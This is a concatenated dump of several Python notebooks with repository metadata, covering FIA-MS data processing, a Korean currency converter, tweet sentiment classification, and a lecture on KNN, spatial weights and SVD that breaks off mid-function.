plt.hist(times, bins=24, facecolor="blue", edgecolor="black")
plt.xlabel("hours")
plt.ylabel("frequency")
plt.title("Time distribution")
plt.show()
# +
from ipywidgets import interact
def f(p):
index = np.where(times == p)[0]
print(data.content[index])
print('Weibo sending time: ')
interact(f, p=(0,23));
| 7,717 |
/.ipynb_checkpoints/DL_NST-checkpoint.ipynb
|
e3f06084ba46475676e8f9ffd16557d17accc90c
|
[] |
no_license
|
OnsElleuch/DL_NST
|
https://github.com/OnsElleuch/DL_NST
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 1,905,712 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: FIA-MS
# language: python
# name: fia-ms
# ---
# # FIA-MS data processing and visualization
# This example notebook presents the use of the custom FIA-MS tools after data pre-processing using SmartPeak
import seaborn as sns
import matplotlib.pyplot as plt
import pandas as pd
import BFAIR.FIA_MS as fia_ms
# Define the location of the example files
# current_dir = %pwd
feature_dir_example = (current_dir + "/data/FIA_MS_example/features_AdditionalAdducts_example")
sequence_triplicates_example = pd.read_csv(current_dir + "/data/FIA_MS_example/sequence_EColi_example.csv", sep=";")
sample_names_triplicates_example = sequence_triplicates_example["sample_group_name"].unique()
database_triplicates_example = pd.read_csv(current_dir + "/data/FIA_MS_example/CHEMISTRY/iJO1366_struct.tsv", sep="\t", header=None)
# ## Run the custom FIA-MS data processing functions
# You will
# - Extract all the relevant information from the provided .featureXML files
# - Calculate basic statistics
intensities_triplicates_example = fia_ms.extractNamesAndIntensities(feature_dir_example, sample_names_triplicates_example, database_triplicates_example)
stats_triplicates_example = fia_ms.calculateMeanVarRSD(intensities_triplicates_example, sequence_triplicates_example.drop_duplicates(["sample_group_name", "replicate_group_name"]), min_reps=3)
# Have quick look at what you extracted. The 'intensities_triplicates_example' should include all replicates of each sample
intensities_triplicates_example
# The summary statistics are reduced to one set per sample. Each of these sets is displayed here as one value per metabolite
stats_triplicates_example
# ### Visualize the data
# After importing and processing the data, we can visulaize it. A good place to start is to have a look at the distributions of its mean values and the corresponding relative standard deviations.
# #### Mean
sns.violinplot(x="replicate_group_name", y="Mean", data=stats_triplicates_example, orient = 'v')
plt.xticks(rotation=70)
plt.title('Mean', size = 20)
# #### RSD
sns.violinplot(x="replicate_group_name", y="RSD", data=stats_triplicates_example, orient = 'v')
plt.xticks(rotation=70)
plt.title('RSD', size = 20)
# ### Separate the data
# #### You can also separate the data based on for example the 'replicate_group_name' in order to visualize certain parts of it
# Split the data by 'replicate_group_name'. Here we do that only for the first sample in the dataset
samples = list(stats_triplicates_example['replicate_group_name'].unique())
samples
StressTest1_P1Ecoli_10xDil = stats_triplicates_example[stats_triplicates_example['replicate_group_name'] == samples[0]]
sns.violinplot(x="replicate_group_name", y="Mean", data=StressTest1_P1Ecoli_10xDil, orient = 'v')
plt.xticks(rotation=70)
sns.violinplot(x="replicate_group_name", y="RSD", data=StressTest1_P1Ecoli_10xDil, orient = 'v')
plt.xticks(rotation=70)
| 3,121 |
/Tweeter Sentiment analysis (1).ipynb
|
d9a245a2ebdc5604c63c88a042a37630c87baf7f
|
[] |
no_license
|
coderraa/twitter-sentiment-analysis
|
https://github.com/coderraa/twitter-sentiment-analysis
| 1 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 853,513 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + slideshow={"slide_type": "slide"}
#ver 1.0
exchange = float(input('환율을 입력해주세요 : '))
cost = int(input('면세품의 금액을 입력해주세요 : '))
result = exchange * cost
print(int(result),'원 입니다.')
# + slideshow={"slide_type": "slide"}
#ver 2.0
rate = {'usa':1136.6, 'jpn':10.36, 'eu' : 150}
country = input('어느 나라 화폐인가요?(usa, jpn, eu) : ')
exchange = rate[country]
cost = int(input('면세품의 금액을 입력해주세요 : '))
result = exchange * cost
print(int(result),'원 입니다.')
# + slideshow={"slide_type": "slide"}
#for문 활용 프로그램
rate = {'usa':1136.6, 'jpn':10.36, 'eu' : 150}
money = int(input('우리나라 돈으로 얼마인가요? : '))
for key in rate :
print(key+' : ' + str(money / float(rate[key])))
# + slideshow={"slide_type": "slide"}
#for, if문 활용 프로그램
rate = {'usa':1136.6, 'jpn':10.36, 'eu' : 150}
money = int(input('우리나라 돈으로 얼마인가요? : '))
for key in rate :
if(key == 'usa'):
unit = 'dollar'
elif(key == 'jpn'):
unit = 'en'
elif(key == 'eu'):
unit = 'euro'
result = money / rate[key]
print(key+' : ' + str(result) + unit)
# + slideshow={"slide_type": "slide"}
#ver 3.0 초기 프로그램
import urllib.request
from bs4 import BeautifulSoup
soup = BeautifulSoup(urllib.request.urlopen('http://info.finance.naver.com/marketindex/exchangeList.nhn').read())
for i in range(5):
info = soup.find_all('a')[i+1].text
print(info)
currency = soup.find_all('td', attrs={"class":"sale"})[i].text
print(currency)
# + slideshow={"slide_type": "slide"}
#ver 3.0 문자열 부분 수정
import urllib.request
from bs4 import BeautifulSoup
soup = BeautifulSoup(urllib.request.urlopen('http://info.finance.naver.com/marketindex/exchangeList.nhn').read(),"lxml")
rate ={}
for i in range(5):
info = soup.find_all('a')[i+1].text.strip()
currency = soup.find_all('td', attrs={"class":"sale"})[i].text.replace(',', '')
rate[info] = currency
print(rate)
# + slideshow={"slide_type": "slide"}
#ver 3.0
import urllib.request
from bs4 import BeautifulSoup
soup = BeautifulSoup(urllib.request.urlopen('http://info.finance.naver.com/marketindex/exchangeList.nhn').read(),"lxml")
rate ={}
for i in range(5):
info = soup.find_all('a')[i+1].text.strip().split()[1]
currency = soup.find_all('td', attrs={"class":"sale"})[i].text.replace(',', '')
rate[info] = currency
print(rate)
country = input('어느 나라 화폐인가요?')
exchange = float(rate[country])
cost = int(input('상품의 금액을 입력해주세요 : '))
result = exchange * cost
print(int(result),'원 입니다.')
p://clipart-library.com/image_gallery2/Twitter-PNG-Image.png', stream=True).raw))
# We use the ImageColorGenerator library from Wordcloud
# Here we take the color of the image and impose it over our wordcloud
image_colors = ImageColorGenerator(Mask)
# Now we use the WordCloud function from the wordcloud library
wc = WordCloud(background_color='black', height=1500, width=4000,mask=Mask).generate(all_words_negative)
# +
# Size of the image generated
plt.figure(figsize=(10,20))
# Here we recolor the words from the dataset to the image's color
# recolor just recolors the default colors to the image's blue color
# interpolation is used to smooth the image generated
plt.imshow(wc.recolor(color_func=image_colors),interpolation="gaussian")
plt.axis('off')
plt.show()
# -
def Hashtags_Extract(x):
hashtags=[]
# Loop over the words in the tweet
for i in x:
ht = re.findall(r'#(\w+)',i)
hashtags.append(ht)
return hashtags
ht_positive = Hashtags_Extract(combine['Tidy_Tweets'][combine['label']==0])
ht_positive
ht_positive_unnest = sum(ht_positive,[])
ht_negative = Hashtags_Extract(combine['Tidy_Tweets'][combine['label']==1])
ht_negative
ht_negative_unnest = sum(ht_negative,[])
word_freq_positive = nltk.FreqDist(ht_positive_unnest)
word_freq_positive
df_positive = pd.DataFrame({'Hashtags':list(word_freq_positive.keys()),'Count':list(word_freq_positive.values())})
df_positive.head(10)
df_positive_plot = df_positive.nlargest(20,columns='Count')
sns.barplot(data=df_positive_plot,y='Hashtags',x='Count')
sns.despine()
word_freq_negative = nltk.FreqDist(ht_negative_unnest)
word_freq_negative
df_negative = pd.DataFrame({'Hashtags':list(word_freq_negative.keys()),'Count':list(word_freq_negative.values())})
df_negative.head(10)
df_negative_plot = df_negative.nlargest(20,columns='Count')
sns.barplot(data=df_negative_plot,y='Hashtags',x='Count')
sns.despine()
from sklearn.feature_extraction.text import CountVectorizer
bow_vectorizer = CountVectorizer(max_df=0.90, min_df=2, max_features=1000, stop_words='english')
# bag-of-words feature matrix
bow = bow_vectorizer.fit_transform(combine['Tidy_Tweets'])
df_bow = pd.DataFrame(bow.todense())
df_bow
from sklearn.feature_extraction.text import TfidfVectorizer
tfidf=TfidfVectorizer(max_df=0.90, min_df=2,max_features=1000,stop_words='english')
tfidf_matrix=tfidf.fit_transform(combine['Tidy_Tweets'])
df_tfidf = pd.DataFrame(tfidf_matrix.todense())
df_tfidf
train_bow = bow[:31962]
train_bow.todense()
train_tfidf_matrix = tfidf_matrix[:31962]
train_tfidf_matrix.todense()
from sklearn.model_selection import train_test_split
x_train_bow, x_valid_bow, y_train_bow, y_valid_bow = train_test_split(train_bow,train['label'],test_size=0.3,random_state=2)
x_train_tfidf, x_valid_tfidf, y_train_tfidf, y_valid_tfidf = train_test_split(train_tfidf_matrix,train['label'],test_size=0.3,random_state=17)
from sklearn.metrics import f1_score
from sklearn.linear_model import LogisticRegression
Log_Reg = LogisticRegression(random_state=0,solver='lbfgs')
Log_Reg.fit(x_train_bow,y_train_bow)
prediction_bow = Log_Reg.predict_proba(x_valid_bow)
prediction_bow
# if prediction is greater than or equal to 0.3 than 1 else 0
# Where 0 is for positive sentiment tweets and 1 for negative sentiment tweets
prediction_int = prediction_bow[:,1]>=0.3
# converting the results to integer type
prediction_int = prediction_int.astype(np.int)
prediction_int
# calculating f1 score
log_bow = f1_score(y_valid_bow, prediction_int)
log_bow
Log_Reg.fit(x_train_tfidf,y_train_tfidf)
prediction_tfidf = Log_Reg.predict_proba(x_valid_tfidf)
prediction_tfidf
# if prediction is greater than or equal to 0.3 than 1 else 0
# Where 0 is for positive sentiment tweets and 1 for negative sentiment tweets
prediction_int = prediction_tfidf[:,1]>=0.3
prediction_int = prediction_int.astype(np.int)
prediction_int
# calculating f1 score
log_tfidf = f1_score(y_valid_tfidf, prediction_int)
log_tfidf
from xgboost import XGBClassifier
model_bow = XGBClassifier(random_state=22,learning_rate=0.9)
model_bow.fit(x_train_bow, y_train_bow)
xgb = model_bow.predict_proba(x_valid_bow)
xgb
# if prediction is greater than or equal to 0.3 than 1 else 0
# Where 0 is for positive sentiment tweets and 1 for negative sentiment tweets
xgb=xgb[:,1]>=0.3
# converting the results to integer type
xgb_int=xgb.astype(np.int)
# calculating f1 score
xgb_bow=f1_score(y_valid_bow,xgb_int)
xgb_bow
model_tfidf = XGBClassifier(random_state=29,learning_rate=0.7)
model_tfidf.fit(x_train_tfidf, y_train_tfidf)
xgb_tfidf=model_tfidf.predict_proba(x_valid_tfidf)
xgb_tfidf
# if prediction is greater than or equal to 0.3 than 1 else 0
# Where 0 is for positive sentiment tweets and 1 for negative sentiment tweets
xgb_tfidf=xgb_tfidf[:,1]>=0.3
# converting the results to integer type
xgb_int_tfidf=xgb_tfidf.astype(np.int)
# calculating f1 score
score=f1_score(y_valid_tfidf,xgb_int_tfidf)
score
from sklearn.tree import DecisionTreeClassifier
dct = DecisionTreeClassifier(criterion='entropy', random_state=1)
dct.fit(x_train_bow,y_train_bow)
dct_bow = dct.predict_proba(x_valid_bow)
dct_bow
# if prediction is greater than or equal to 0.3 than 1 else 0
# Where 0 is for positive sentiment tweets and 1 for negative sentiment tweets
dct_bow=dct_bow[:,1]>=0.3
# converting the results to integer type
dct_int_bow=dct_bow.astype(np.int)
# calculating f1 score
dct_score_bow=f1_score(y_valid_bow,dct_int_bow)
dct_score_bow
dct.fit(x_train_tfidf,y_train_tfidf)
dct_tfidf = dct.predict_proba(x_valid_tfidf)
dct_tfidf
# if prediction is greater than or equal to 0.3 than 1 else 0
# Where 0 is for positive sentiment tweets and 1 for negative sentiment tweets
dct_tfidf=dct_tfidf[:,1]>=0.3
# converting the results to integer type
dct_int_tfidf=dct_tfidf.astype(np.int)
# calculating f1 score
dct_score_tfidf=f1_score(y_valid_tfidf,dct_int_tfidf)
dct_score_tfidf
Algo_1 = ['LogisticRegression(Bag-of-Words)','XGBoost(Bag-of-Words)','DecisionTree(Bag-of-Words)']
score_1 = [log_bow,xgb_bow,dct_score_bow]
compare_1 = pd.DataFrame({'Model':Algo_1,'F1_Score':score_1},index=[i for i in range(1,4)])
compare_1.T
plt.figure(figsize=(18,5))
sns.pointplot(x='Model',y='F1_Score',data=compare_1)
plt.title('Bag-of-Words')
plt.xlabel('MODEL')
plt.ylabel('SCORE')
plt.show()
Algo_2 = ['LogisticRegression(TF-IDF)','XGBoost(TF-IDF)','DecisionTree(TF-IDF)']
score_2 = [log_tfidf,score,dct_score_tfidf]
compare_2 = pd.DataFrame({'Model':Algo_2,'F1_Score':score_2},index=[i for i in range(1,4)])
compare_2.T
plt.figure(figsize=(18,5))
sns.pointplot(x='Model',y='F1_Score',data=compare_2)
plt.title('TF-IDF')
plt.xlabel('MODEL')
plt.ylabel('SCORE')
plt.show()
Algo_best = ['LogisticRegression(Bag-of-Words)','LogisticRegression(TF-IDF)']
score_best = [log_bow,log_tfidf]
compare_best = pd.DataFrame({'Model':Algo_best,'F1_Score':score_best},index=[i for i in range(1,3)])
compare_best.T
plt.figure(figsize=(18,5))
sns.pointplot(x='Model',y='F1_Score',data=compare_best)
plt.title('Logistic Regression(Bag-of-Words & TF-IDF)')
plt.xlabel('MODEL')
plt.ylabel('SCORE')
plt.show()
test_tfidf = tfidf_matrix[31962:]
test_pred = Log_Reg.predict_proba(test_tfidf)
test_pred_int = test_pred[:,1] >= 0.3
test_pred_int = test_pred_int.astype(np.int)
test['label'] = test_pred_int
submission = test[['id','label']]
submission.to_csv('result.csv', index=False)
res = pd.read_csv('result.csv')
res
sns.countplot(train_original['label'])
sns.despine()
| 10,213 |
/task1_char_language_model.ipynb
|
4b72361ac0256fb4e359e42beaeff524490d6658
|
[] |
no_license
|
EgShes/small_pytorch_projects
|
https://github.com/EgShes/small_pytorch_projects
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 33,296 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="7Rxk1tbt8dX6"
# # Lecture7 : Advanced Features
#
# (Author: Simone Azeglio, [email protected])
# + id="QdDA5FJ3FxTT"
import warnings
warnings.filterwarnings('ignore')
# + id="ZZggCAPQbDjD" colab={"base_uri": "https://localhost:8080/", "height": 1000} outputId="a45db10c-7272-485a-a7d4-543873b08582"
# !pip install scikit-bio geopandas libpysal splot pygeos
# + [markdown] id="q2i_mtFufXfW"
# # K-Nearest-Neighbors (KNN)
#
# Intro with sklearn and a quick example
# + id="nzXnUlbDGd_P"
import matplotlib.pyplot as plt
# %matplotlib inline
import pandas as pd
from sklearn import datasets, neighbors
from sklearn.model_selection import cross_val_score, train_test_split
from mlxtend.plotting import plot_decision_regions
# + id="_HlTNPH9BU7f" colab={"base_uri": "https://localhost:8080/", "height": 224} outputId="357f7c61-1258-4316-efec-f50e820cc570"
# !wget https://raw.githubusercontent.com/MLJCUnito/ProjectX2020/master/HowToTackleAMLCompetition/Data/Lecture7/data_ushape.csv
# + id="AV8T3znVDLOJ" colab={"base_uri": "https://localhost:8080/", "height": 204} outputId="6982ab67-a3a1-4a6c-a029-8c6fcac6be83"
data = pd.read_csv("data_ushape.csv")
data.head()
# + id="syQHcc-2Diyr"
X = data[["X","Y"]].values
y = data["class"].astype(int).values
# + id="UbJn5r7tDodL" colab={"base_uri": "https://localhost:8080/", "height": 68} outputId="c8e53bc0-910d-4fff-a760-f50993a723d7"
k_ex = 5
clf = neighbors.KNeighborsClassifier(n_neighbors=k_ex)
clf.fit(X, y)
# + id="1l1H-2t1Erh-" colab={"base_uri": "https://localhost:8080/", "height": 295} outputId="4c6e2a10-2d10-44f5-bdc5-18c25ed467fc"
# Plotting decision region
plot_decision_regions(X, y, clf=clf, legend=2)
# Adding axes annotations
plt.xlabel("X")
plt.ylabel("Y")
plt.title("Knn with K="+ str(k_ex))
plt.show()
# + id="gto4O_h7Gzzj"
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)
# + id="b7RSdwXlFPax"
# creating a list of k for KNN
k_list = list(range(1,50,2))
# creating a list of cv scores
cv_scores = []
# perform 10-fold cross validation
for k in k_list:
knn = neighbors.KNeighborsClassifier(n_neighbors=k)
scores = cross_val_score(knn, X_train, y_train, cv = 10, scoring = "accuracy")
cv_scores.append(scores.mean())
# + id="aEpY7RyUHLSU" colab={"base_uri": "https://localhost:8080/", "height": 666} outputId="74980587-bec1-4056-af3d-144abd5336ed"
plt.figure(figsize=(15,10))
plt.title('The optimal number of neighbors', fontsize=20, fontweight='bold')
plt.xlabel('Number of Neighbors K', fontsize=15)
plt.ylabel('Accuracy', fontsize=15)
plt.grid()
plt.plot(k_list, cv_scores)
# + id="zGH3IZvPHoyt" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="da062b28-2195-4c0b-d9e7-ca46ca4b2ca9"
best_k = k_list[cv_scores.index(max(cv_scores))]
worst_k = k_list[cv_scores.index(min(cv_scores))]
print("Optimal number of neighbors: " + str(best_k))
# + id="TtWmOZAkIF3R" colab={"base_uri": "https://localhost:8080/", "height": 320} outputId="cf4dcce3-0cb8-4d4f-c2d6-f78fb5d61fcb"
figure, axis = plt.subplots(1,2,
subplot_kw = dict(aspect = "equal"),
figsize=(12,8))
best_clf = neighbors.KNeighborsClassifier(n_neighbors=best_k)
#Use all your data now !!
best_clf.fit(X, y)
worst_clf = neighbors.KNeighborsClassifier(n_neighbors=worst_k)
worst_clf.fit(X,y)
# Plotting decision region
plot_decision_regions(X, y, clf=best_clf, legend=2, ax = axis[0])
plot_decision_regions(X, y, clf=worst_clf, legend=2, ax = axis[1])
# + [markdown] id="CX3BYeA3K_QA"
# ### A Use Case (KNN in Spatial Weights Matrices and Geo-Data)
# + id="EV3c3xarttT0" colab={"base_uri": "https://localhost:8080/", "height": 204} outputId="6a4da82f-0d89-4d03-8c3e-739981015832"
# !wget https://raw.githubusercontent.com/openpolis/geojson-italy/master/geojson/limits_IT_municipalities.geojson
# + id="yznGdozRufgJ"
import geopandas as gpd
import matplotlib.pyplot as plt
import libpysal.weights as lp
from splot.libpysal import plot_spatial_weights
# + id="wtiFbGyTvp23" colab={"base_uri": "https://localhost:8080/", "height": 479} outputId="e9b0d23d-2cce-47f5-90b0-21c2fc2a3a07"
municip = gpd.read_file("limits_IT_municipalities.geojson")
piemonte_municip = municip[municip.reg_name == "Piemonte"]
torino_prov = piemonte_municip[piemonte_municip.prov_name == "Torino"]
torino_prov.head()
# + id="8oeZGvyBxIV7" colab={"base_uri": "https://localhost:8080/", "height": 282} outputId="493cd4c7-0c13-4ea1-da56-90fb6a847b9b"
torino_prov.plot()
# + id="gNLghubUznBo" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="24c5c9bb-cabe-4e19-e3f3-40ec15bc36bb"
torino_prov.shape
# + id="fPS_w4VdBLGt" colab={"base_uri": "https://localhost:8080/", "height": 35} outputId="8cd8e9ee-ed39-4263-8daa-27003ad85ae3"
import libpysal
libpysal.__version__
# + [markdown] id="b3rmkWjl41FV"
# ### Constructing Adjacency Matrix
# + id="uTkWPgbizng5"
w_queen = lp.Queen.from_dataframe(torino_prov, geom_col= "geometry")
# + id="An6JkNn3ISno" colab={"base_uri": "https://localhost:8080/", "height": 356} outputId="f53cb4a3-f46e-4ce0-d62c-3288d60b1139"
plot_spatial_weights(w_queen, torino_prov)
plt.show()
# + id="jkSlwOcYznjw" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="23a7eee3-1335-4282-fd15-185c7166f3b9"
w_queen.neighbors[4]
# + id="RZLLKOKi8_J2" colab={"base_uri": "https://localhost:8080/", "height": 151} outputId="1dd892eb-b0a9-469b-edb6-459e265230d6"
torino_prov[torino_prov.name == "Torino"]
# + id="s69sBaj439Bm" colab={"base_uri": "https://localhost:8080/", "height": 151} outputId="5c062cd4-af0c-4848-ec91-b30b44511c00"
torino_prov.loc[[267]]
# + id="Yw8Aiha53zpr" colab={"base_uri": "https://localhost:8080/", "height": 1000} outputId="8feaa190-21e1-4510-f3b7-4266f28ba639"
torino_prov.loc[w_queen.neighbors[267]]
# + id="kbeDxKxh35Rt" colab={"base_uri": "https://localhost:8080/", "height": 282} outputId="66d601b9-50bd-4786-e295-0830a258b8d6"
figure, axis = plt.subplots(1,1)
torino_prov.plot(color = "grey", ax = axis)
torino_prov.loc[[267]].plot(color = "r", ax = axis)
torino_prov.loc[w_queen.neighbors[267]].plot(color = "b", ax = axis)
# + [markdown] id="-8bH-7g-4rf_"
#
#
#
# + id="SdCvXP3-znmk"
w_knn5 = lp.KNN.from_dataframe(torino_prov, k = 5)
# + id="iWzY4Il6DL7W" colab={"base_uri": "https://localhost:8080/", "height": 626} outputId="28d04334-41c2-46f4-84e1-e991ba86d39c"
figure, axis = plt.subplots(1,1, figsize = (12, 10))
torino_prov.boundary.plot(ax = axis)
w_knn5.plot(torino_prov, edge_kws= dict(color = "blue", alpha = .33), ax = axis)
# + id="pKXYT6fIDXAs" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="68fb76f8-8240-47e4-da7e-e5fe42555229"
len(w_knn5.asymmetries)
# + id="NJZJzK7ADcx-" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="58a5214c-89ce-4254-a5b7-dbbda1bb8b00"
w_knn5.nonzero
# + id="CcbJnC_oDkOD"
w_knn3 = lp.KNN.from_dataframe(torino_prov, k = 3)
# + id="bj1keJ-iKfm9" colab={"base_uri": "https://localhost:8080/", "height": 626} outputId="12eb7161-063a-441b-ffea-7217552db491"
figure, axis = plt.subplots(1,1, figsize = (12, 10))
torino_prov.boundary.plot(ax = axis)
w_knn3.plot(torino_prov, edge_kws= dict(color = "red", alpha = .33), ax = axis)
# + id="fhCyJPthDuaT" colab={"base_uri": "https://localhost:8080/", "height": 626} outputId="f1f8a48a-da9d-44de-aa3f-77f7d08c0593"
figure, axis = plt.subplots(1,1, figsize = (12, 10))
#torino_prov.boundary.plot(ax = axis)
w_knn5.plot(torino_prov, edge_kws= dict(color = "blue", alpha = .33),
node_kws = dict(marker = "."), ax = axis)
w_knn3.plot(torino_prov, edge_kws=dict(color = "red", alpha = .33 ),
node_kws = dict(marker ="."), ax =axis)
# + [markdown] id="OLDGzrV0tsWC"
# Note that every link in the KNN-3 is also contained in the KNN-5. This is because every observation that is one of the top two closest observations to another observation will always be in the closest five as well.
# + id="crk_waxwLfp1" colab={"base_uri": "https://localhost:8080/", "height": 316} outputId="00a67d71-cbef-46dc-d851-822f3b8b407a"
plt.hist(w_queen.sparse.sum(axis = 1))
# + id="qJQ9_lFPGWFV" colab={"base_uri": "https://localhost:8080/", "height": 316} outputId="0ff89449-58df-4d6a-ad79-d37910650e54"
plt.hist(w_knn5.sparse.sum(axis = 1))
# + id="3k_xOZkSLs8I"
w_knn5_symmetric = w_knn5.symmetrize()
# + id="B7G7e1H1LyWR" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="96936dfc-1e9a-4b3c-ba49-80b21fa37312"
w_knn5_symmetric.asymmetries
# + id="4HnKwg2vL6do" colab={"base_uri": "https://localhost:8080/", "height": 316} outputId="0f34b34a-3490-4e3b-ffce-ade7d9fe7fdd"
plt.hist(w_knn5_symmetric.sparse.sum(axis = 1))
# + [markdown] id="Zn_cKiEFMCbn"
# ### Kernel Weights (Bonus)
#
# Kernel weights reflect spatial relationships that decay with distance.
#
#
# + id="oYf81CSqMFK9"
triangular = lp.Kernel.from_dataframe(torino_prov)
# + id="fqHFU54H5ZN_" colab={"base_uri": "https://localhost:8080/", "height": 612} outputId="9e2ee84a-9d17-4fba-da43-b16f8040157e"
figure, axis = plt.subplots(1,1, figsize = (12, 10))
axis.matshow(triangular.sparse.toarray())
# + id="e-VPxJ4x7bLF" colab={"base_uri": "https://localhost:8080/", "height": 612} outputId="31efdb6d-04d2-4450-bd88-3c4620f0c721"
triangular_10 = lp.Kernel.from_dataframe(torino_prov, bandwidth = 10)
figure, axis = plt.subplots(1,1, figsize = (12, 10))
axis.matshow(triangular_10.sparse.toarray())
# + id="fLuPgoFS7rlV" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="1b4279a7-1a77-4e64-ded4-e8ba18751320"
triangular.bandwidth[0]
# + id="689BvZcd7uLU" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="a255674d-3285-4092-e2e3-740c46a6885d"
triangular_10.bandwidth[0]
# + id="zKOFV6Ys7wmr" colab={"base_uri": "https://localhost:8080/", "height": 316} outputId="6a2d2516-e627-40d7-8e55-a4c21a155168"
figure, axis = plt.subplots(1,2,
subplot_kw = dict(aspect = "equal"),
figsize=(12,8))
flat_weights = triangular.sparse[267].toarray().flatten()
flat_weights_10 = triangular_10.sparse[267].toarray().flatten()
torino_prov.assign(w = flat_weights).plot("w", ax = axis[0])
torino_prov.assign(w = flat_weights_10).plot("w", ax = axis[1])
# + [markdown] id="7J4H-M7g9S3K"
# We can also adjust the function used to generate the kernel.
# + id="uxNws9tw9lVF" colab={"base_uri": "https://localhost:8080/", "height": 282} outputId="1de13e73-5fb9-4daa-c53b-7ac3674c37e8"
gaussian = lp.Kernel.from_dataframe(torino_prov, function = "gaussian")
flat_weights_g = gaussian.sparse[267].toarray().flatten()
torino_prov.assign(w = flat_weights_g).plot("w")
# + id="4vgPM6NM93OH" colab={"base_uri": "https://localhost:8080/", "height": 612} outputId="360a390c-517a-49b9-d90f-707bb6a4c474"
figure, axis = plt.subplots(1,1, figsize = (12, 10))
axis.matshow(gaussian.sparse.toarray())
# + [markdown] id="lCmISroD9_zS"
# Adaptive bandwidth allow for kernels to adjust dynamically
# + id="RMPN21F39_Pq"
gaussian_adaptive = lp.Kernel.from_dataframe(torino_prov, function = "gaussian", k = 40, fixed = False)
# + id="mvMXYfwj-Ojb" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="afea359d-f162-44cf-e83f-ff29f329adad"
gaussian_adaptive.bandwidth[0]
# + id="FMMuTyFr-S8u" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="240bc32c-5da3-4aa3-8222-a16db83164b2"
gaussian_adaptive.bandwidth[1]
# + id="q3KyudGU-V2k" colab={"base_uri": "https://localhost:8080/", "height": 350} outputId="b0eaa7f0-d2b8-4756-8923-0a3eecfb68cd"
plt.hist(gaussian_adaptive.bandwidth.flatten())
# + id="MsD-3q3u-gRm" colab={"base_uri": "https://localhost:8080/", "height": 316} outputId="aa61a45e-4b82-48fc-f3b2-6f353fa18fb5"
figure, axis = plt.subplots(1,2, subplot_kw= dict(aspect = "equal"), figsize = (12, 8))
weights_gaussian_adaptive = gaussian_adaptive.sparse[267].toarray().flatten()
torino_prov.assign(w = flat_weights_g).plot("w", ax = axis[0])
torino_prov.assign(w = weights_gaussian_adaptive).plot("w", ax = axis[1])
# + [markdown] id="_UnJGFPYabRC"
# ### A Non-Euclidean Distance: Bray-Curtis
#
# Definition, a few lines on non-euclidean distances
# + id="xTk_pK0KeOOF" colab={"base_uri": "https://localhost:8080/", "height": 204} outputId="2777842a-8ae1-42cd-d2f9-6b0f76082961"
# %matplotlib inline
import numpy as np
import pandas as pd
sample_ids = ['A', 'B', 'C']
feature_ids = ['OTU1', 'OTU2', 'OTU3', 'OTU4', 'OTU5']
data = np.array([[1, 0, 0],
[3, 2, 0],
[0, 0, 6],
[1, 4, 2],
[0, 4, 1]])
table1 = pd.DataFrame(data, index=feature_ids, columns=sample_ids)
table1
# + id="Q-7MECTLbrsn"
#from scipy.spatial.distance import braycurtis
from skbio.stats.distance import DistanceMatrix
# + id="x-tWuDKKdZQ3"
def bray_curtis_distance(table, sample1_id, sample2_id):
numerator = 0
denominator = 0
sample1_counts = table[sample1_id]
sample2_counts = table[sample2_id]
for sample1_count, sample2_count in zip(sample1_counts, sample2_counts):
numerator += abs(sample1_count - sample2_count)
denominator += sample1_count + sample2_count
return numerator / denominator
# + id="e4Mkv2V1ej8x"
def df_to_distances(table, pairwise_distance_fn):
sample_ids = table.columns
num_samples = len(sample_ids)
data = np.zeros((num_samples, num_samples))
for i, sample1_id in enumerate(sample_ids):
for j, sample2_id in enumerate(sample_ids[:i]):
data[i,j] = data[j,i] = pairwise_distance_fn(table, sample1_id, sample2_id)
return DistanceMatrix(data, sample_ids)
# + id="1k4zP9cre491" colab={"base_uri": "https://localhost:8080/", "height": 349} outputId="be661253-b2dc-47ef-9be5-95719c195d00"
df_to_distances(table1, bray_curtis_distance)
# + [markdown] id="S31y3ZpRGxPy"
# # Matrix Factorization Methods: SVD, PCA, NMF
#
# Many complex matrix operations cannot be solved efficiently or with stability using the limited precision of computers.
#
# Matrix factorization are methods that reduce a matrix into constituent parts that make it easier to calculate more complex matrix operations. Matrix factorization methods, also called matrix decomposition methods, are a foundation of linear algebra in computers, even for basic operations such as solving systems of linear equations, calculating the inverse, and calculating the determinant of a matrix.
#
# ## SVD
#
# SVD (Singular Value Decomposition) is one of the above cited methods. Essentially, SVD states that a matrix can be represented as the product of other 3 matrices. Mathematically speaking:
#
# $ A_{nxp} = U_{nxn} S_{nxp} V_{pxp}^T$
#
# where $n$ is the number of samples (i.e. rows), and $p$ is the number of features (i.e. columns).
#
# Let's build a geometric intuition behind SVD:
# *$A$ is a matrix that can be seen as a linear transformation. This transformation can be decomposed in three sub-transformations: 1. rotation, 2. re-scaling, 3. rotation. These three steps correspond to the three matrices $U$, $S$, and $V$.*
#
# **Every matrix is a linear transformation**
#
#
# + id="2EmgIXaW_G2q"
# Thanks to https://hadrienj.github.io/, I've adapted his version in order to deal with subplots.
def plotVectors(vecs, cols, alpha=1, ax = None):
ax = ax or plt.gca()
#plt.figure(figsize = (6,6))
ax.axvline(x=0, color='#A9A9A9', zorder=0)
ax.axhline(y=0, color='#A9A9A9', zorder=0)
for i in range(len(vecs)):
x = np.concatenate([[0,0],vecs[i]])
